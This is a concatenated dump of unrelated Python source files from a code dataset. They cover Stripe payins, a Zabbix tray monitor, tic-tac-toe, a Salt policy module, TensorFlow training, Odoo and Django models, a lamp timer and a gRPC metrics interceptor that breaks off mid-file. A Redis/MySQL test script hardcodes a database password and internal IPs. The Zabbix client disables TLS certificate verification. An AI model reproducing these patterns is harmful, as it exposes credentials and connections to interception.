this same request at the same time,\n # retry in a second.\n sleep(1)\n return execute_transfer(db, pt, destination, source_transaction)\n website.tell_sentry(e, {})\n return update_payin_transfer(db, pt.id, '', 'failed', repr_stripe_error(e))\n except Exception as e:\n website.tell_sentry(e, {})\n return update_payin_transfer(db, pt.id, '', 'failed', str(e))\n # `Transfer` objects don't have a `status` attribute, so if no exception was\n # raised we assume that the transfer was successful.\n return update_payin_transfer(db, pt.id, tr.id, 'succeeded', None)\n\n\ndef settle_destination_charge(db, payin, charge, pt, intent_id=None):\n \"\"\"Record the result of a charge, and recover the fee.\n \"\"\"\n if getattr(charge, 'balance_transaction', None):\n bt = charge.balance_transaction\n if isinstance(bt, str):\n bt = stripe.BalanceTransaction.retrieve(bt)\n amount_settled = int_to_Money(bt.amount, bt.currency)\n fee = int_to_Money(bt.fee, bt.currency)\n net_amount = amount_settled - fee\n\n if getattr(charge, 'transfer', None):\n tr = stripe.Transfer.retrieve(charge.transfer)\n if tr.amount_reversed == 0:\n try:\n tr.reversals.create(\n amount=bt.fee,\n description=\"Stripe fee\",\n metadata={'payin_id': payin.id},\n idempotency_key='payin_fee_%i' % payin.id,\n )\n except stripe.error.StripeError as e:\n if e.code == 'idempotency_key_in_use':\n # Two threads are submitting this same request at the\n # same time, retry in a second.\n sleep(1)\n return settle_destination_charge(\n db, payin, charge, pt, intent_id=intent_id\n )\n raise\n else:\n amount_settled, fee, net_amount = None, None, payin.amount\n\n status = charge.status\n error = repr_charge_error(charge)\n\n payin = update_payin(\n db, payin.id, charge.id, status, error,\n amount_settled=amount_settled, fee=fee, intent_id=intent_id\n )\n\n pt_remote_id = getattr(charge, 'transfer', None)\n pt = update_payin_transfer(\n db, pt.id, pt_remote_id, status, error, amount=net_amount\n )\n\n return payin\n","sub_path":"liberapay/payin/stripe.py","file_name":"stripe.py","file_ext":"py","file_size_in_byte":14310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"104152353","text":"#!/usr/bin/env python\n#try:\n# from gi.repository import Gtk, GLib\n#except:\n# from pgi.repository import Gtk, GLib\nfrom gi.repository import Gtk, GLib\nfrom pyzabbix import ZabbixAPI\nfrom time import sleep\nimport datetime\nimport threading\n\nclass ZabbixWatch:\n def __init__(self,config):\n self.config = config\n self.zabbix = ZabbixAPI(self.config.get(\"Zabbix\",\"server\"))\n self.zabbix.session.verify = False\n self.zabbix.login(\n self.config.get(\"Zabbix\",\"user\"),\n self.config.get(\"Zabbix\",\"password\"))\n self.running = True\n self.callback = None\n self.update_intervall = int(self.config.get(\"Zabbix\",\"update_interval\"))\n try:\n self.hostgroups_rawstring = self.config.get(\"Zabbix\",\"hostgroups\")\n if len(self.hostgroups_rawstring) > 0:\n self.hostgroups_raw = [ h.strip(\" \") for h in self.hostgroups_rawstring.split(\",\") ]\n self.hostgroups = self.zabbix.hostgroup.get(\n output=\"extend\",\n filter={\"name\": self.hostgroups_raw }\n )\n else:\n self.hostgroups = self.zabbix.hostgroup.get(output=\"extend\")\n except :\n pass\n\n self.trigger_collector_thread = threading.Thread(target=self.listen)\n\n def listen(self):\n while self.running:\n try:\n # we get the problem event for the hostgroups\n events = self.zabbix.event.get(groupids=[int(h[\"groupid\"]) for h in self.hostgroups],value=1,source=0)\n # we get the triggers of these events\n triggers = self.zabbix.trigger.get(\n only_true=1,\n active=1,\n filter={\"value\":1},\n output=\"extend\",\n triggerids=[int(t[\"objectid\"]) for t in events],\n expandComment=1,\n expandDescription=1,\n expandData='host'\n )\n GLib.idle_add(lambda: self.callback(triggers))\n except:\n pass\n\n sleep(self.update_intervall)\n\n def watch(self):\n self.running = True\n self.trigger_collector_thread.start()\n\n def stop_watching(self):\n self.running = False\n\n\n\nclass ZabbixStatusIcon:\n def __init__(self,config):\n GLib.threads_init()\n self.config = config\n self.icon_problem = self.config.get(\"ZabbixTray\",\"icon_problem\")\n self.icon_ok = self.config.get(\"ZabbixTray\",\"icon_ok\")\n self.statusicon = Gtk.StatusIcon()\n self.statusicon.set_from_file(self.icon_ok)\n self.statusicon.connect(\"popup-menu\", self.right_click_event)\n\n self.zabbix = ZabbixWatch(self.config)\n self.zabbix.callback = self.update_triggers\n self.zabbix.trigger_collector_thread.start()\n\n self.triggers = []\n\n def update_triggers(self,triggers):\n self.triggers = triggers\n self.state = False\n max_prio = 0\n problem = False\n for t in triggers:\n prio = int(t[\"priority\"])\n problem_value = int(t[\"value\"])\n if prio >= max_prio:\n max_prio = prio\n if problem_value > 0:\n problem = True\n\n if problem:\n self.statusicon.set_from_file(self.icon_problem)\n else:\n self.statusicon.set_from_file(self.icon_ok)\n #if max_prio >= 2 and int(t[\"value\"]) > 0:\n # self.statusicon.set_from_file(self.icon_problem)\n #else:\n # self.statusicon.set_from_file(self.icon_ok)\n\n\n def quit(self,args):\n self.zabbix.stop_watching()\n Gtk.main_quit()\n\n def format_lastchange(self,trigger_lastchange):\n lastchange = datetime.datetime.fromtimestamp(int(trigger_lastchange))\n since = datetime.datetime.now() - lastchange\n days = since.days\n hours = since.seconds / 3600\n minutes = (since.seconds / 60 % 60)\n seconds = since.seconds % 60\n since_str = \"\"\n\n if days > 0:\n since_str += \"%dd \" % days\n if hours > 0:\n since_str += \"%02dh \" % hours\n since_str += \"%02dm %02ds\" % (minutes,seconds)\n return since_str\n\n\n def right_click_event(self, icon, button, time):\n self.menu = Gtk.Menu()\n problem = False\n\n for trigger in self.triggers:\n trigger_entry = Gtk.ImageMenuItem()\n trigger_lastchange = self.format_lastchange(trigger[\"lastchange\"])\n if int(trigger[\"value\"]) == 1:\n image = Gtk.Image()\n image.set_from_file(self.icon_problem)\n #t_value = '\\xe2\\x9c\\x96'.decode(\"utf-8\")\n trigger_entry.set_image(image)\n trigger_entry.set_always_show_image(True)\n elif int(trigger[\"value\"]) == 0:\n image = Gtk.Image()\n image.set_from_file(self.icon_ok)\n trigger_entry.set_image(image)\n trigger_entry.set_always_show_image(True)\n #t_value = '\\xe2\\x9c\\x94'.decode(\"utf-8\")\n\n\n trigger_entry.set_image(image)\n trigger_entry.set_always_show_image(True)\n\n t_value = \"\"\n trigger_entry.set_label(\"%s %s: %s [%s]\" % (\n t_value,\n trigger[\"hostname\"],\n trigger[\"description\"],\n trigger_lastchange)\n )\n self.menu.append(trigger_entry)\n\n quit = Gtk.MenuItem()\n quit.set_label(\"Quit\")\n\n quit.connect(\"activate\", self.quit)\n self.menu.append(quit)\n self.menu.show_all()\n\n #def pos(menu, icon):\n # return (Gtk.StatusIcon.position_menu(menu, icon))\n\n #self.menu.popup(None, None, pos, self.statusicon, button, time)\n self.menu.popup(None, None, None, self.statusicon, button, time)","sub_path":"lib/zabbixstatusicon.py","file_name":"zabbixstatusicon.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"146253193","text":"import os\n\nclass Board():\n \"\"\"Represents the game-board\"\"\"\n def __init__(self):\n self.board = [i for i in range(10)]\n self._win_combinations = [\n (1, 2, 3),\n (4, 5, 6),\n (7, 8, 9),\n (1, 5, 9),\n (3, 5, 7),\n (1, 4, 7),\n (2, 5, 8),\n (3, 6, 9)]\n self.game_over = False\n\n def draw_board(self):\n \"\"\"Draws the board to the terminal\"\"\"\n print(\"=========\")\n print(self.board[7], \"|\", self.board[8], \"|\", self.board[9])\n print(self.board[4], \"|\", self.board[5], \"|\", self.board[6])\n print(self.board[1], \"|\", self.board[2], \"|\", self.board[3])\n print(\"=========\")\n\n def check_if_won(self, player):\n \"\"\"Checks if the move the player just made, made him/her win the game\"\"\"\n for a, b, c in self._win_combinations:\n if self.board[a] == self.board[b] == self.board[c]:\n print(f\"Game over, player {player} won the game\")\n self.game_over = True\n\n def update(self, input, choice):\n \"\"\"Update the current board\"\"\"\n self.board[input] = choice\n os.system(\"clear\")\n self.draw_board()\n self.check_if_won(choice)\n\n def reset_board(self):\n \"\"\"Resets the board\"\"\"\n self.board = [i for i in range(10)]\n\n def tie(self):\n \"\"\"Stops the game if tie\"\"\"\n list_ = list(filter(lambda x: type(x) != int, self.board))\n return len(list_) == 9\n\n\nclass TicTacToe():\n def __init__(self):\n os.system(\"clear\")\n self.board = Board()\n self.player_1_char = \"\"\n self.player_2_char = \"\"\n self.corret_choice = False\n self.get_player_char()\n\n def reset(self):\n \"\"\"Resets the internal state to prepare for a new game\"\"\"\n self.player_1_char = \"\"\n self.player_2_char = \"\"\n self.board.reset_board()\n\n def get_player_char(self):\n \"\"\"Ask the player what character he wants to use and verify choice\"\"\"\n while True:\n player_1_char = input(\"Do you want to play X or O? \")\n print()\n if player_1_char == \"X\":\n self.player_1_char = \"X\"\n self.player_2_char = \"O\"\n print(\"Starting player selected X\")\n break\n elif player_1_char == \"O\":\n self.player_1_char = \"O\"\n self.player_2_char = \"X\"\n print(\"Starting player selected O\")\n break\n else:\n print(\"ERROR - input has to be either X or O!\")\n os.system(\"clear\")\n\n def get_player_input(self, player_char):\n while True:\n while True:\n x = input(f\"{player_char} Where do you want to place your piece?\")\n if x.isdigit():\n x = int(x)\n break\n else:\n print(\"Input has to be a number, try again\")\n\n if x > 0 and x < 10 and type(self.board.board[x]) != str:\n self.board.update(x, player_char)\n break\n elif x == 10:\n quit()\n else: \n print(\"Spot is taken, try again: \")\n\n def check_tie(self):\n if self.board.tie():\n self.board.game_over = True\n print(\"Game is a tie\")\n return True\n return False\n\n def run(self):\n self.board.draw_board()\n\n while not self.board.game_over:\n self.correct_player_1 = False\n self.correct_player_2 = False\n\n self.get_player_input(self.player_1_char)\n if self.board.game_over:\n break\n if self.check_tie():\n break\n\n self.get_player_input(self.player_2_char)\n if self.board.game_over:\n break\n if self.check_tie():\n break\n\n\nwhile True:\n TicTacToe().run()\n\n user_input = \"a\"\n while user_input not in \"ny\":\n user_input = input(\"Play again? (y/n)\").lower()\n\n if user_input == \"y\":\n continue\n else:\n break","sub_path":"tictactoeRefactored.py","file_name":"tictactoeRefactored.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"654128889","text":"import io\nimport json\nimport logging\nimport sys\n\nLOG = logging.getLogger(__name__)\n\nimport yaml\nimport yaml.constructor\n\ntry:\n # included in standard lib from Python 2.7\n from collections import OrderedDict\nexcept ImportError:\n # try importing the backported drop-in replacement\n # it's available on PyPI\n from ordereddict import OrderedDict\n\n# https://stackoverflow.com/questions/5121931/in-python-how-can-you-load-yaml-mappings-as-ordereddicts\nclass OrderedDictYAMLLoader(yaml.Loader):\n \"\"\"\n A YAML loader that loads mappings into ordered dictionaries.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n yaml.Loader.__init__(self, *args, **kwargs)\n\n self.add_constructor(u'tag:yaml.org,2002:map', type(self).construct_yaml_map)\n self.add_constructor(u'tag:yaml.org,2002:omap', type(self).construct_yaml_map)\n\n def construct_yaml_map(self, node):\n data = OrderedDict()\n yield data\n value = self.construct_mapping(node)\n data.update(value)\n\n def construct_mapping(self, node, deep=False):\n if isinstance(node, yaml.MappingNode):\n self.flatten_mapping(node)\n else:\n raise yaml.constructor.ConstructorError(None, None,\n 'expected a mapping node, but found %s' % node.id, node.start_mark)\n\n mapping = OrderedDict()\n for key_node, value_node in node.value:\n key = self.construct_object(key_node, deep=deep)\n try:\n hash(key)\n except TypeError as exc:\n raise yaml.constructor.ConstructorError('while constructing a mapping',\n node.start_mark, 'found unacceptable key (%s)' % exc, key_node.start_mark)\n value = self.construct_object(value_node, deep=deep)\n mapping[key] = value\n return mapping\n\n\ndef __virtual__():\n return True\n\n\ndef rule_list(path, **kwargs):\n try:\n with io.open(path, 'r') as file_handle:\n rules = yaml.load(file_handle, OrderedDictYAMLLoader) or OrderedDict()\n except Exception as e:\n msg = \"Unable to load policy file %s: %s\" % (path, repr(e))\n LOG.debug(msg)\n rules = {'Error': msg}\n return rules\n\n\ndef rule_delete(name, path, **kwargs):\n ret = {}\n rules = __salt__['keystone_policy.rule_list'](path, **kwargs)\n if 'Error' not in rules:\n if name not in rules:\n return ret\n del rules[name]\n try:\n with io.open(path, 'w') as file_handle:\n if path.endswith('json'):\n serialized = json.dumps(rules, indent=4)\n else:\n serialized = yaml.safe_dump(rules, indent=4)\n if sys.version_info[0] >= 3:\n file_handle.write(serialized)\n else:\n file_handle.write(unicode(serialized))\n except Exception as e:\n msg = \"Unable to save policy file: %s\" % repr(e)\n LOG.error(msg)\n return {'Error': msg}\n ret = 'Rule {0} deleted'.format(name)\n return ret\n\n\ndef rule_set(name, rule, path, **kwargs):\n rules = __salt__['keystone_policy.rule_list'](path, **kwargs)\n if 'Error' not in rules:\n if name in rules and rules[name] == rule:\n return {name: 'Rule %s already exists and is in correct state' % name}\n rules.update({name: rule})\n try:\n with io.open(path, 'w') as file_handle:\n if path.endswith('json'):\n serialized = json.dumps(rules, indent=4)\n else:\n serialized = yaml.safe_dump(rules, indent=4)\n if sys.version_info[0] >= 3:\n file_handle.write(serialized)\n else:\n file_handle.write(unicode(serialized))\n except Exception as e:\n msg = \"Unable to save policy file %s: %s\" % (path, repr(e))\n LOG.error(msg)\n return {'Error': msg}\n return rule_get(name, path, **kwargs)\n return rules\n\n\ndef rule_get(name, path, **kwargs):\n ret = {}\n rules = __salt__['keystone_policy.rule_list'](path, **kwargs)\n if 'Error' in rules:\n ret['Error'] = rules['Error']\n elif name in rules:\n ret[name] = rules.get(name)\n\n return ret\n\n","sub_path":"_modules/keystone_policy.py","file_name":"keystone_policy.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"598714698","text":"import pymysql\nimport set_adsl\nimport socket\nfrom redis import StrictRedis\n\n\ndef test_redis(host, port):\n server = StrictRedis(host=host, port=port, decode_responses=True)\n server.sadd('aaaaa', 'aaaaa')\n v = server.spop('aaaaa')\n print(v)\n\n\ndef test_mysql(host, port):\n etl_conf = {'host': host, 'port': port, 'user': 'spider', 'password': 'chenguang', 'charset': 'utf8',\n 'db': 'spider', 'cursorclass': pymysql.cursors.DictCursor}\n etl = pymysql.connect(**etl_conf)\n cursor = etl.cursor()\n sql = \"\"\"select host from information_schema.processlist WHERE ID=connection_id();\"\"\"\n cursor.execute(sql)\n result = cursor.fetchone()\n print(result.get('host'))\n\n\ndef _get_host_ip():\n \"\"\"\n 获取当前网络环境的ip地址\n :return:\n \"\"\"\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n s.connect(('8.8.8.8', 80))\n ip = s.getsockname()[0]\n finally:\n s.close()\n return ip\n\n\nif __name__ == '__main__':\n set_adsl.set_interface('10.146.254.57')\n r = {'host': '10.142.97.80', 'port': 50111}\n # m = {'host': '10.146.252.112', 'port': 50112}\n test_redis(**r)\n # test_mysql(**m)\n","sub_path":"Diglossia/scrapyProject/others/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"555082056","text":"from flask import (Blueprint, render_template, abort, request, redirect)\nfrom jinja2 import TemplateNotFound\nfrom subscribie.auth import login_required\n\nmodule_iframe_embed = Blueprint('iframe_embed', __name__, template_folder='templates')\n\n@module_iframe_embed.route('/iframe_embed/index') # Define a module index page\n@module_iframe_embed.route('/show-iframe-embed')\n@login_required\ndef get_iframe_embed():\n \"\"\"Set optimised title tags for your pages.\"\"\"\n iframe = '''\n '''.format(request.host_url)\n try:\n return render_template('show-iframe-embed.html', iframe=iframe)\n except TemplateNotFound:\n abort(404)\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"183450055","text":"#!/usr/bin/env python\n\n# Get annual and diurnal cycle position from \n# wind, temperature, and prmsl.\n\nimport os\nimport sys\nimport tensorflow as tf\n#tf.enable_eager_execution()\nfrom tensorflow.data import Dataset\nimport pickle\nimport numpy\nfrom glob import glob\n\n# How many epochs to train for\nn_epochs=25\n\n# Target data setup\nbuffer_size=100\nbatch_size=1\n\n# Training datasets with four variables\ninput_file_dir=((\"%s/Machine-Learning-experiments/datasets/uk_centred/\" +\n \"20CR2c/air.2m/training/\") %\n os.getenv('SCRATCH'))\nt2m_files=glob(\"%s/*.tfd\" % input_file_dir)\nn_steps=len(t2m_files)\ntr_tfd = tf.constant(t2m_files)\n\n# Create TensorFlow Dataset object from the file names\ntr_data = Dataset.from_tensor_slices(tr_tfd).repeat(n_epochs)\n\n# From the t2m file name, make a four-variable tensor\ndef load_tensor(file_name):\n sict = tf.read_file(file_name)\n t2m = tf.parse_tensor(sict,numpy.float32)\n t2m = tf.reshape(t2m,[79,159,1])\n file_name = tf.strings.regex_replace(file_name,\n 'air.2m','prmsl')\n sict = tf.read_file(file_name)\n prmsl = tf.parse_tensor(sict,numpy.float32)\n prmsl = tf.reshape(prmsl,[79,159,1])\n file_name = tf.strings.regex_replace(file_name,\n 'prmsl','uwnd.10m')\n sict = tf.read_file(file_name)\n uwnd = tf.parse_tensor(sict,numpy.float32)\n uwnd = tf.reshape(uwnd,[79,159,1])\n file_name = tf.strings.regex_replace(file_name,\n 'uwnd.10m','vwnd.10m')\n sict = tf.read_file(file_name)\n vwnd = tf.parse_tensor(sict,numpy.float32)\n vwnd = tf.reshape(vwnd,[79,159,1])\n ict = tf.concat([t2m,prmsl,uwnd,vwnd],2) # Now [79,159,4]\n ict = tf.reshape(ict,[79,159,4])\n return ict\n\n# From the t2m file name, calculate the cycle locations\nmday=tf.constant([0,31,59,90,120,151,181,212,243,273,304,334])\ndef cycle_tensor(file_name):\n fdte = tf.strings.substr(file_name,-17,17)\n year = tf.strings.substr(fdte,0,5)\n mnth = tf.strings.substr(fdte,5,2)\n day = tf.strings.substr(fdte,8,2)\n day = tf.cond(tf.math.equal(mnth+day,'0229'),\n lambda: tf.constant('28'),lambda: day)\n hour = tf.strings.substr(fdte,11,2)\n diurnal = tf.strings.to_number(hour)/24.0\n mnth_i = tf.strings.to_number(mnth,tf.dtypes.int32)-1\n annual = (tf.cast(tf.gather(mday,mnth_i),tf.dtypes.float32)+\n tf.strings.to_number(day))*3.141592/365.0\n annual = tf.math.sin(annual)\n cycles = tf.stack([annual,diurnal], 0)\n return cycles\n\ntr_source = tr_data.map(load_tensor)\ntr_target = tr_data.map(cycle_tensor)\ntr_data = Dataset.zip((tr_source, tr_target))\ntr_data = tr_data.shuffle(buffer_size).batch(batch_size)\n\n# Same for the test dataset\ninput_file_dir=((\"%s/Machine-Learning-experiments/datasets/uk_centred/\" +\n \"20CR2c/air.2m/test/\") %\n os.getenv('SCRATCH'))\nt2m_files=glob(\"%s/*.tfd\" % input_file_dir)\ntest_steps=len(t2m_files)\ntest_tfd = tf.constant(t2m_files)\ntest_data = Dataset.from_tensor_slices(test_tfd).repeat(n_epochs)\ntest_source = test_data.map(load_tensor)\ntest_target = test_data.map(cycle_tensor)\ntest_data = Dataset.zip((test_source, test_target))\ntest_data = test_data.batch(batch_size)\n\n# Input placeholder\noriginal = tf.keras.layers.Input(shape=(79,159,4,), name='encoder_input')\n# Encoding layers\nx = tf.keras.layers.Conv2D(4, (3, 3), padding='same')(original)\nx = tf.keras.layers.ELU()(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Conv2D(12, (3, 3), strides= (2,2), padding='valid')(x)\nx = tf.keras.layers.ELU()(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Conv2D(36, (3, 3), strides= (2,2), padding='valid')(x)\nx = tf.keras.layers.ELU()(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Conv2D(108, (3, 3), strides= (2,2), padding='valid')(x)\nx = tf.keras.layers.ELU()(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Reshape(target_shape=(9*19*108,))(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Dense(100,)(x)\nx = tf.keras.layers.ELU()(x)\nencoded = tf.keras.layers.Dense(2,)(x)\n\nencoder = tf.keras.models.Model(inputs=original, \n outputs=encoded, \n name='encoder')\n\nencoder.compile(optimizer='adadelta',loss='mean_squared_error')\n\n# Save model and history state after every epoch\nhistory={}\nhistory['loss']=[]\nhistory['val_loss']=[]\nclass CustomSaver(tf.keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs={}):\n save_dir=(\"%s/Machine-Learning-experiments/\"+\n \"convolutional_autoencoder_perturbations/\"+\n \"check_cycles/saved_models/Epoch_%04d\") % (\n os.getenv('SCRATCH'),epoch)\n if not os.path.isdir(os.path.dirname(save_dir)):\n os.makedirs(os.path.dirname(save_dir))\n for model in ['encoder']:\n if not os.path.isdir(os.path.dirname(\"%s/%s\" % (save_dir,model))):\n os.makedirs(os.path.dirname(\"%s/%s\" % (save_dir,model)))\n tf.keras.models.save_model(encoder,\"%s/encoder\" % save_dir)\n history['loss'].append(logs['loss'])\n history['val_loss'].append(logs['val_loss'])\n history_file=(\"%s/Machine-Learning-experiments/\"+\n \"convolutional_autoencoder_perturbations/\"+\n \"check_cycles/saved_models/history_to_%04d.pkl\") % (\n os.getenv('SCRATCH'),epoch)\n pickle.dump(history, open(history_file, \"wb\"))\n \nsaver = CustomSaver()\n\n# Train the encoder\nhistory=encoder.fit(x=tr_data,\n epochs=n_epochs,\n steps_per_epoch=n_steps,\n validation_data=test_data,\n validation_steps=test_steps,\n verbose=1,\n callbacks=[saver])\n\n","sub_path":"experiments/convolutional_autoencoder_perturbations/uk_centred_4var/check_cycles/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":5876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"573974947","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nfrom openerp.osv import osv, fields\n\nclass res_partner(osv.osv):\n _inherit = \"res.partner\"\n\n _columns = {\n 'mol': fields.char('MOL', help(\"Материално отговорно лице\")),\n 'bulstat': fields.char('Bulstat', help('Булстат')),\n 'egn': fields.integer('EGN', help(\"Единен граждански номер\"))\n }\n","sub_path":"openerp/addons/roki/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"111998105","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0019_auto_20140713_1820'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='tour',\n name='scheme_method',\n field=models.CharField(default='weekly', max_length=256, choices=[('weekly', 'Rullande veckoschema'), ('irregular', 'Oregelbundet')]),\n preserve_default=True,\n ),\n ]\n","sub_path":"rida/core/migrations/0020_tour_scheme_method.py","file_name":"0020_tour_scheme_method.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"357617851","text":"import time\nfrom datetime import datetime\nfrom lamp import Lamp\n\n# TURN_ON_FADE_IN = { 'hour': 13, 'minute': 00 }\n# TURN_ON_FULL = { 'hour': 15, 'minute': 00 }\n# TURN_ON_FADE_OUT = { 'hour': 22, 'minute': 00 }\n# TURN_OFF = { 'hour': 23, 'minute': 59 }\nTURN_ON_FADE_IN = { 'hour': 14, 'minute': 0 }\nTURN_ON_FULL = { 'hour': 15, 'minute': 30 }\nTURN_ON_FADE_OUT = { 'hour': 22, 'minute': 0 }\nTURN_OFF = { 'hour': 23, 'minute': 30 }\n\nlamp = Lamp()\n\ndef start_job():\n hour = 13\n minute = 50\n while True:\n now = datetime.now()\n\n # hour = int(now.strftime('%H'))\n # minute = int(now.strftime('%M'))\n print(hour, \":\", minute)\n\n if should_turn_fade_in(hour, minute):\n intensity = 100 - int(time_diff({'hour': hour, 'minute': minute}, TURN_ON_FULL) * 100 / LENGTH_FADE_IN)\n print(\"clareando: \", intensity)\n lamp.turn_blue_to(intensity)\n lamp.turn_white_to(intensity)\n lamp.turn_red_to(intensity)\n\n elif should_turn_full_on(hour, minute):\n print(\"acesa\")\n lamp.turn_blue_to(100)\n lamp.turn_white_to(100)\n lamp.turn_red_to(100)\n\n elif should_turn_fade_out(hour, minute):\n intensity = int(time_diff({'hour': hour, 'minute': minute}, TURN_OFF) * 100 / LENGTH_FADE_OUT)\n print(\"apagando: \", intensity)\n lamp.turn_blue_to(intensity)\n lamp.turn_white_to(intensity)\n lamp.turn_red_to(intensity)\n \n else:\n print(\"apagada\")\n lamp.turn_blue_to(0)\n lamp.turn_white_to(0)\n lamp.turn_red_to(0)\n\n time.sleep(0.1)\n\n minute += 1\n if minute == 60:\n minute = 0\n hour += 1\n if hour == 24:\n hour = 0\n\ndef should_turn_fade_in(current_hour, current_minute):\n return current_hour * 60 + current_minute >= TURN_ON_FADE_IN['hour'] * 60 + TURN_ON_FADE_IN['minute'] and \\\n current_hour * 60 + current_minute <= TURN_ON_FULL['hour'] * 60 + TURN_ON_FULL['minute']\n\ndef should_turn_full_on(current_hour, current_minute):\n return current_hour * 60 + current_minute >= TURN_ON_FULL['hour'] * 60 + TURN_ON_FULL['minute'] and \\\n current_hour * 60 + current_minute <= TURN_ON_FADE_OUT['hour'] * 60 + TURN_ON_FADE_OUT['minute']\n\ndef should_turn_fade_out(current_hour, current_minute):\n return current_hour * 60 + current_minute >= TURN_ON_FADE_OUT['hour'] * 60 + TURN_ON_FADE_OUT['minute'] and \\\n current_hour * 60 + current_minute <= TURN_OFF['hour'] * 60 + TURN_OFF['minute']\n\ndef time_diff(start, end):\n if start['hour'] > end['hour'] or start['hour'] == end['hour'] and start['minute'] > end['minute']:\n return (datetime(2020, 1, 2, end['hour'], end['minute'], 0) - \\\n datetime(2020, 1, 1, start['hour'], start['minute'], 0)) \\\n .total_seconds()\n else: \n return (datetime(2020, 1, 1, end['hour'], end['minute'], 0) - \\\n datetime(2020, 1, 1, start['hour'], start['minute'], 0)) \\\n .total_seconds() \n\n \nLENGTH_FADE_IN = time_diff(TURN_ON_FADE_IN, TURN_ON_FULL)\nLENGTH_FADE_OUT = time_diff(TURN_ON_FADE_OUT, TURN_OFF)\n\n# print(time_diff(TURN_ON_FADE_IN, TURN_ON_FULL))\n# print(time_diff(TURN_ON_FULL, TURN_ON_FADE_OUT))\n# print(time_diff(TURN_ON_FADE_OUT, TURN_OFF))\n# print(time_diff(TURN_OFF, TURN_ON_FADE_IN))\n# print ('apagou')\nstart_job()\n","sub_path":"src/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"491884365","text":"import grpc\nimport time\n\nfrom timeit import default_timer\n\nfrom .server_metrics import SERVER_HANDLED_LATENCY_SECONDS\nfrom .server_metrics import SERVER_HANDLED_COUNTER\nfrom .server_metrics import SERVER_STARTED_COUNTER\n\nfrom .util import type_from_method\nfrom .util import code_to_string\n\n\ndef _wrap_rpc_behavior(handler, fn):\n if handler is None:\n return None\n\n if handler.request_streaming and handler.response_streaming:\n behavior_fn = handler.stream_stream\n handler_factory = grpc.stream_stream_rpc_method_handler\n elif handler.request_streaming and not handler.response_streaming:\n behavior_fn = handler.stream_unary\n handler_factory = grpc.stream_unary_rpc_method_handler\n elif not handler.request_streaming and handler.response_streaming:\n behavior_fn = handler.unary_stream\n handler_factory = grpc.unary_stream_rpc_method_handler\n else:\n behavior_fn = handler.unary_unary\n handler_factory = grpc.unary_unary_rpc_method_handler\n\n return handler_factory(fn(behavior_fn,\n handler.request_streaming,\n handler.response_streaming),\n request_deserializer=handler.request_deserializer,\n response_serializer=handler.response_serializer)\n\n\nclass PromServerInterceptor(grpc.ServerInterceptor):\n\n def intercept_service(self, continuation, handler_call_details):\n\n handler = continuation(handler_call_details)\n\n # only support unary\n if handler.request_streaming or handler.response_streaming:\n return handler\n\n client_call_method = handler_call_details.method\n ss = client_call_method.split(\"/\")\n if len(ss) < 3:\n return continuation(handler_call_details)\n grpc_service = ss[1]\n grpc_method = ss[2]\n grpc_type = type_from_method(handler.request_streaming, handler.response_streaming)\n\n SERVER_STARTED_COUNTER.labels(\n grpc_type=grpc_type,\n grpc_service=grpc_service,\n grpc_method=grpc_method).inc()\n\n def latency_wrapper(behavior, request_streaming, response_streaming):\n def new_behavior(request_or_iterator, service_context):\n start = default_timer()\n try:\n rsp = behavior(request_or_iterator, service_context)\n if service_context._state.code is None:\n SERVER_HANDLED_COUNTER.labels(\n grpc_type=grpc_type,\n grpc_service=grpc_service,\n grpc_method=grpc_method,\n grpc_code=code_to_string(grpc.StatusCode.OK)\n ).inc()\n else:\n SERVER_HANDLED_COUNTER.labels(\n grpc_type=grpc_type,\n grpc_service=grpc_service,\n grpc_method=grpc_method,\n grpc_code=code_to_string(service_context._state.code)\n ).inc()\n return rsp\n except grpc.RpcError as e:\n if isinstance(e, grpc.Call):\n SERVER_HANDLED_COUNTER.labels(\n grpc_type=grpc_type,\n grpc_service=grpc_service,\n grpc_method=grpc_method,\n grpc_code=code_to_string(e.code())\n ).inc()\n else:\n SERVER_HANDLED_COUNTER.labels(\n grpc_type=grpc_type,\n grpc_service=grpc_service,\n grpc_method=grpc_method,\n grpc_code=code_to_string(grpc.StatusCode.UNKNOWN)\n ).inc()\n raise e\n finally:\n SERVER_HANDLED_LATENCY_SECONDS.labels(\n grpc_type=grpc_type,\n grpc_service=grpc_service,\n 